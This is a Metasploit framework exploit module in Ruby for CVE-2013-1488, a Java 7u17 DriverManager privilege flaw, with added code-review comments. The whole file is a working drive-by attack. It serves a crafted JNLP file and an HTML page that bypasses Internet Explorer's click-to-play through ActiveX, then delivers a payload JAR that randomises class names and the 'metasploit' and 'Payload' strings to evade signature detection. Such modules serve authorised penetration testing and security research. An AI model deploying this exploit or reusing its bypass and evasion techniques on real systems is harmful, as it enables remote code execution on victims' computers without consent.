GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_driver_manager.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser exploit module for CVE-2013-1488 (java.sql.DriverManager privileged
# toString(); Java 7u17 and earlier per the description below).
#
# Everything is served by the HttpServer mixin and dispatched on the request
# URI suffix in on_request_uri:
#   *.jnlp  -> the JNLP descriptor built by jnlp_file
#   *.jar   -> the payload JAR plus the precompiled classes read in setup
#   .../    -> the HTML landing page built by generate_html
#   other   -> redirect to the resource root
#
# The five precompiled artefacts live under
# <Msf::Config.data_directory>/exploits/cve-2013-1488/ and are loaded once in
# setup; nothing is compiled at run time.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  # Not referenced directly in this file; presumably required by the native
  # (win/osx/linux) targets declared below — confirm against the mixin.
  include Msf::Exploit::EXE

  # BrowserAutopwn registration is left disabled.
  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Module metadata only: name, description, references, four targets
  # (one Java payload target, three native x86 targets) and payload limits.
  # All 'Notes' fields are left UNKNOWN_*.
  #
  # @param info [Hash] metadata passed through update_info to super
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
        'Description' => %q{
This module abuses the java.sql.DriverManager class where the toString() method
is called over user supplied classes from a doPrivileged block. The vulnerability
affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer
and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java
Web Start can be launched automatically through the ActiveX control. Otherwise, the
applet is launched without click-to-play bypass.
},
        'License' => MSF_LICENSE,
        'Author' => [
          'James Forshaw', # Vulnerability discovery and Analysis
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-1488' ],
          [ 'OSVDB', '91472' ],
          [ 'BID', '58504' ],
          [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
          [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
          [ 'ZDI', '13-076' ]
        ],
        'Platform' => %w{java linux osx win},
        # DisableNops: the payload is carried inside a JAR, so a NOP sled makes no sense here.
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [
            'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [
            'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [
            'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-01-10',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Loads the precompiled artefacts into instance variables and picks the
  # per-run random names, then hands off to the mixin's setup.
  #
  # Each File.open is the plain raising form: a missing artefact aborts
  # setup with Errno::ENOENT rather than serving an incomplete JAR later.
  # The whole file is read as binary (fd.stat.size bytes).
  def setup
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "Exploit.class")
    @exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver.class")
    @driver_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver2.class")
    @driver2_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
    # Service-provider manifests; both are added verbatim to the JAR in on_request_uri.
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")
    @object_services = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")
    @driver_services = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    # Randomise the main class name by patching the class-file bytes in place.
    # The replacement has the same length as "Exploit", presumably so the
    # substitution leaves the file's encoded string lengths intact — confirm
    # before changing it. Note gsub! touches every occurrence of "Exploit"
    # in the bytes, not only the class name.
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)

    # Name of the served JNLP file; referenced by jnlp_file and generate_html.
    @jnlp_name = rand_text_alpha(8)

    super
  end

  # Builds the JNLP descriptor served for any *.jnlp request.
  #
  # Its href points back at this server. The vendor, description, jar name and
  # applet name are random per request; the jar href does not need to match
  # anything because on_request_uri serves the JAR for every *.jar URI.
  # The j2se version string, the parameter name "__applet_ssv_validated" and the
  # MIME type used by the caller are fixed, so they are the stable markers of
  # this module's JNLP on the wire.
  #
  # @return [String] the JNLP XML document
  def jnlp_file
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

    jnlp = %Q|
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
<information>
<title>Applet Test JNLP</title>
<vendor>#{rand_text_alpha(8)}</vendor>
<description>#{rand_text_alpha(8)}</description>
<offline-allowed/>
</information>

<resources>
<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
<jar href="#{rand_text_alpha(8)}.jar" main="true" />
</resources>
<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
<param name="__applet_ssv_validated" value="true"></param>
</applet-desc>
<update check="background"/>
</jnlp>
|
    return jnlp
  end

  # HTTP request dispatcher (HttpServer mixin callback).
  #
  # @param cli the connected client handed over by the mixin
  # @param request the parsed HTTP request; only request.uri is inspected
  #
  # NOTE(review): the suffix regexes use `$`, which also matches before an
  # embedded newline; `\z` is the strict end-of-string anchor. Unlikely to
  # matter for a request URI, but worth knowing when reading the match.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jnlp$/i
      send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
    when /\.jar$/i
      # `payload` here is the module's payload method: the local of the same
      # name is only assigned further down, in the "/" branch, and Ruby does
      # not treat it as a local before that point in the source.
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("FakeDriver.class", @driver_class)
      jar.add_file("FakeDriver2.class", @driver2_class)
      jar.add_file("META-INF/services/java.lang.Object", @object_services)
      jar.add_file("META-INF/services/java.sql.Driver", @driver_services)
      # Replace the strings "metasploit" and "Payload" in every entry's name
      # and bytes with random alphabetic strings of the same length
      # (case-sensitive; only those two spellings are touched). Names are
      # patched in place with gsub!, data is reassigned; the manifest is
      # rebuilt afterwards so it reflects the renamed entries.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Landing page. The payload is regenerated per client first; on failure
      # the client gets a 404 instead of a page pointing at a JAR we cannot build.
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      # Anything else is bounced to the resource root, which lands in the "/" branch.
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the HTML landing page served for the resource root.
  #
  # The <object> element carries a fixed codebase URL and classid with the
  # JNLP URI in its "app" parameter; the nested <applet> tag is the fallback
  # for browsers that do not instantiate the object. The classid, codebase
  # and parameter names are constant across runs, unlike the jar/class names.
  #
  # @return [String] the HTML document
  def generate_html
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

    # When the browser is IE, the ActiveX control is used in order to load the malicious JNLP, allowing click2play bypass
    # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
    html = %Q|
<html>
<body>
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
<param name="app" value="#{jnlp_uri}">
<param name="back" value="true">
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</object>
</body>
</html>
|
    return html
  end
end